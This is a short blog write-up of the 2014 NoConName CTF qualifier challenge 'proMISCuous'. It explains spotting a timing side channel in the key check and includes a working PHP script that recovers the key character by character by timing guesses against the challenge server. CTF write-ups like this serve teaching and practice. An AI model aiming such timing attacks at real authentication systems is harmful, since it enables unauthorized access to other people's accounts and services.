15 September 2014

NOCONNAME CTF QUALS 2014: proMISCuous WRITEUP

Connect to the service and get the key. The flag is: "NcN_" + sha1sum(key)
88.87.208.163:6969

connecting to the service
nc 88.87.208.163 6969 -vv

Connection to 88.87.208.163 6969 port [tcp/*] succeeded!

and it waits for our input
writing anything results "Invalid key"
after little thoughs could find out it's side channel attack, it takes little bit more with char "t"

here's my final script to grab the hole key

 <?php  
      $char =array_merge(range("a","z"),range("A","Z"));  
      $str="";  
      while(1){  
           $arr=array();  
           foreach($char as $var=>$val){  
                $sock = fsockopen("88.87.208.163", "6969");  
                $start =microtime(true);  
                fwrite($sock, $str.$val."\n");  
                $result=fgets($sock,1080);  
                $end  =microtime(true);  
                $arr[]=($end-$start);  
           }  
           $str.=$char[array_search(max($arr), $arr)];  
           echo $char[array_search(max($arr), $arr)];  
      }  
 ?>  

No comments:

Post a Comment